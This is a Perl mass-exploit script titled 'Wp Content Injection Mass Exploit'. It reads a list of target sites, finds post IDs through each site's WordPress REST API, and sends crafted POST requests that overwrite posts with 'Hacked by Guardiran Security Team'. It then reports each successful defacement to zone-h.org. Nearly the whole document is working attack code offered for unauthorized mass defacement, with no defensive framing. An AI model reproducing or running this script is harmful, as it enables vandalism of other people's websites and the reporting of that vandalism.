Wp Content Injection Mass Exploit

#!/usr/bin/perl
use Term::ANSIColor;
use LWP::UserAgent;
use HTTP::Request;
use HTTP::Request::Common qw(POST);
$ua = LWP::UserAgent->new(keep_alive => 1);
$ua->agent("Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)");
$ua->timeout (10);

system(($^O eq 'MSWin32') ? 'cls' : 'clear');

print "

 _     _  _______
| | _ | ||       |        ##########################
| || || ||    _  |        # Coded By : DR-IMAN     #
|       ||   |_| |        # Site : Guardiran.org   #
|       ||    ___|        # Tel : DarkCod3r        #
|   _   ||   |            ##########################
|__| |__||___|
 _______  _______  __    _  _______  _______  __    _  _______
|       ||       ||  |  | ||       ||       ||  |  | ||       |
|       ||   _   ||   |_| ||_     _||    ___||   |_| ||_     _|
|       ||  | |  ||       |  |   |  |   |___ |       |  |   |
|      _||  |_|  ||  _    |  |   |  |    ___||  _    |  |   |
|     |_ |       || | |   |  |   |  |   |___ | | |   |  |   |
|_______||_______||_|  |__|  |___|  |_______||_|  |__|  |___|
 ___   __    _      ___  _______  _______  _______  ___   _______  __    _
|   | |  |  | |    |   ||       ||       ||       ||   | |       ||  |  | |
|   | |   |_| |    |   ||    ___||       ||_     _||   | |   _   ||   |_| |
|   | |       |    |   ||   |___ |       |  |   |  |   | |  | |  ||       |
|   | |  _    | ___|   ||    ___||      _|  |   |  |   | |  |_|  ||  _    |
|   | | | |   ||       ||   |___ |     |_   |   |  |   | |       || | |   |
|___| |_|  |__||_______||_______||_______|  |___|  |___| |_______||_|  |__|

\n";
print " site:";
my $list=<STDIN>;
chomp($list);
  open (THETARGET, "<$list") || die "[-] Incorrect List Below !";
@TARGETS = <THETARGET>;
close THETARGET;
$link=$#TARGETS + 1;

foreach $site(@TARGETS){

chomp $site;
if($site !~ /http:\/\//) { $site = "http://$site/"; };
$linkposts = $site . 'index.php/wp-json/wp/v2/posts/';


print "Scanning  $site\n";

$ua = LWP::UserAgent->new(keep_alive => 1);
$ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");
$ua->timeout (10);


$ask = $ua->get($linkposts);
$formurl = $ask->content;
if($formurl =~/\/?p=(.*?)\"\}/)
{
$id=$1;

$ajx = $site . '/wp-json/wp/v2/posts/'.$id;
$askk = $ua->get($ajx);
$formurll = $askk->content;
if($formurll =~/link\":\"(.*?)\",\"/)
{
$link=$1;
$link =~ s/\\|//g;


    open(save, '>>Results.txt');
    print save "$link\n";
    close(save);
$def="Hacked by Guardiran Security Team";
$width=$id . 'justracccwdata';
$face = POST $ajx, ['id' => $width, 'title' => 'hacked By Guardiran Security Team', 'content' => $def ];
$response = $ua->request($face);
$start = $response->content;
    if ($start =~ /Guardiran/){
print (" Successfully !!!"),"\n";
zonpost();
}else{
print (" Don't Hacked :("),"\n";
}
}
}
}
sub zonpost{
$req = HTTP::Request->new(GET=>$link);
$useragent = LWP::UserAgent->new();
$response = $useragent->request($req);
$ar = $response->content;
if ($ar =~ /Hacked|Guardiran |Team/){

                $dmn= $link;
                $def="Guardiran Security Team";
                $zn="http://zone-h.org/notify/single";
                $lwp=LWP::UserAgent->new;
                $res=$lwp  -> post($zn,[
                'defacer'     => $def,
                'domain1'   => $dmn,
                'hackmode' => '15',
                'reason'       => '1',
                'submit'       => 'Send',
                ]);
                if ($res->content =~ //) {
                print (" submit $1"),"\n";
                }
                else
                {
                print (" Error !!!"),"\n";
                }
                     }else{
                        print" Not Done !! \n";
}
}